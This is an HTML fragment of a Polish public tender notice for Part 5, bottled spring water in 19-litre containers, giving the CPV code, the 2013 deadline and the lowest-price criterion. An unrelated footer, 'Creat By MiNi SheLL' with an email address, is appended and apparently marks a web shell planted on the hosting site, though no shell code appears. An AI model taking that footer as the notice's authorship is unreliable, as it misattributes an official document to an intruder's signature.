<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda źródlana, niegazowana, butle o pojemności ok. 19 litrów hermetyczne  zamykana	szt	18.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com